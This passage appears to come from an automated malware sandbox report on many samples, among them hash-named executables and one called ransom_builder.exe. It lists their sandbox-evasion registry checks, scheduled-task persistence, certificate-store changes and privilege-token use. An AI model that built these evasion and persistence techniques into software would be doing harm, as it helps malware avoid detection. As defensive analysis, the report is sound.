200 3304 5524 WerFault.exe 215 4444 5524 WerFault.exe 215 1516 2172 WerFault.exe 165 5944 2172 WerFault.exe 165 2196 2172 WerFault.exe 165 5752 5452 WerFault.exe 301 -
Checks SCSI registry key(s) 3 TTPs 30 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
asg.exeMsiExec.exe987123.execb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exetoolspub1.exea0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exeuuishcr721E.exe83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exedescription ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI asg.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MsiExec.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 987123.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uuishcr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 721E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MsiExec.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 721E.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 987123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI asg.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 721E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI asg.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uuishcr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 987123.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uuishcr -
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
syncUpd.exetimeSync.exeopenwith.exefirefox.exeinstall.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 syncUpd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString syncUpd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString timeSync.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString openwith.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 timeSync.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString install.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 openwith.exe -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 4152 schtasks.exe 5076 schtasks.exe 5800 schtasks.exe 3336 schtasks.exe 8412 schtasks.exe 2372 schtasks.exe 5252 schtasks.exe 6428 schtasks.exe 6188 schtasks.exe 5152 schtasks.exe 8976 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 2544 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
GoLang User-Agent 4 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 604 Go-http-client/1.1 HTTP User-Agent header 923 Go-http-client/1.1 HTTP User-Agent header 924 Go-http-client/1.1 HTTP User-Agent header 1017 Go-http-client/1.1 -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid Process 744 taskkill.exe 4272 taskkill.exe -
Modifies Control Panel 2 IoCs
Processes:
abc.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Control Panel\Desktop abc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Control Panel\Desktop\WallpaperStyle = "10" abc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenetsh.exepowershell.exedescription ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control\NetTrace\Session netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Modifies registry class 11 IoCs
Processes:
abc.exe1800.exeARA.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\1YwR2c1YK\DefaultIcon\ = "C:\\ProgramData\\1YwR2c1YK.ico" abc.exe Key created \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.1YwR2c1YK\ = "1YwR2c1YK" abc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\1YwR2c1YK abc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\1YwR2c1YK\DefaultIcon abc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance 1800.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000_Classes\Local Settings ARA.exe Key created \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.1YwR2c1YK abc.exe -
NTFS ADS 1 IoCs
Processes:
NINJA.exedescription ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\Files\winmgmts:\localhost\root\SecurityCenter2 NINJA.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
installer.exepid Process 4388 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
toolspub1.exepowershell.exe.exed21cbe21e38b385a41a68c5e6dd32f4c.exepid Process 3500 toolspub1.exe 3500 toolspub1.exe 2488 powershell.exe 2488 powershell.exe 2488 powershell.exe 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 3340 4800 .exe 4800 .exe 3340 3340 3340 3340 3340 3340 524 d21cbe21e38b385a41a68c5e6dd32f4c.exe 524 d21cbe21e38b385a41a68c5e6dd32f4c.exe 3340 3340 3340 3340 3340 3340 3340 -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
Processes:
6.exeinstaller.exeNINJA.exe4363463463464363463463463.bin.exeransom_builder.exepid Process 1468 6.exe 4388 installer.exe 3340 6268 NINJA.exe 3772 4363463463464363463463463.bin.exe 6392 ransom_builder.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
toolspub1.exe721E.exeviewer.exeliveupdate.execmd.exepid Process 3500 toolspub1.exe 4068 721E.exe 7036 viewer.exe 6892 liveupdate.exe 6552 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
chrome.exechrome.exepid Process 5432 chrome.exe 5432 chrome.exe 5432 chrome.exe 5432 chrome.exe 1436 chrome.exe 1436 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
4363463463464363463463463.bin.exepowershell.exema.exe.exed21cbe21e38b385a41a68c5e6dd32f4c.exeapp1.exepowershell.exevbc.exewerfault.exeghjk.exepowershell.exepowershell.exetaskkill.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3772 4363463463464363463463463.bin.exe Token: SeDebugPrivilege 2488 powershell.exe Token: SeDebugPrivilege 992 ma.exe Token: SeDebugPrivilege 4800 .exe Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeDebugPrivilege 524 d21cbe21e38b385a41a68c5e6dd32f4c.exe Token: SeImpersonatePrivilege 524 d21cbe21e38b385a41a68c5e6dd32f4c.exe Token: SeDebugPrivilege 4160 app1.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeLockMemoryPrivilege 2392 vbc.exe Token: SeLockMemoryPrivilege 2392 vbc.exe Token: SeDebugPrivilege 1960 werfault.exe Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeDebugPrivilege 4812 ghjk.exe Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeDebugPrivilege 628 powershell.exe Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 744 taskkill.exe Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeDebugPrivilege 1648 powershell.exe Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 Token: SeShutdownPrivilege 3340 Token: SeCreatePagefilePrivilege 3340 -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
vbc.exeinstaller.exejune.tmpcmd.exefu.exesystem.exeHelper.exepid Process 2392 vbc.exe 4388 installer.exe 4388 installer.exe 4556 june.tmp 5852 cmd.exe 4308 fu.exe 3340 3340 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 364 system.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 5456 Helper.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
fu.exesystem.exepid Process 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 4308 fu.exe 364 system.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe 4308 fu.exe 364 system.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
6.exeinstaller.exedota.exeBroomSetup.exefirefox.exerhsgn_protected.exeiexplore.exeEverything.exeplaza.exeransom_builder.exe%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exedota.exeasg.exepid Process 1468 6.exe 4388 installer.exe 4388 installer.exe 4900 dota.exe 3000 BroomSetup.exe 5232 firefox.exe 6264 rhsgn_protected.exe 6880 iexplore.exe 4636 Everything.exe 7372 plaza.exe 6392 ransom_builder.exe 6480 %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe 1808 dota.exe 6680 asg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
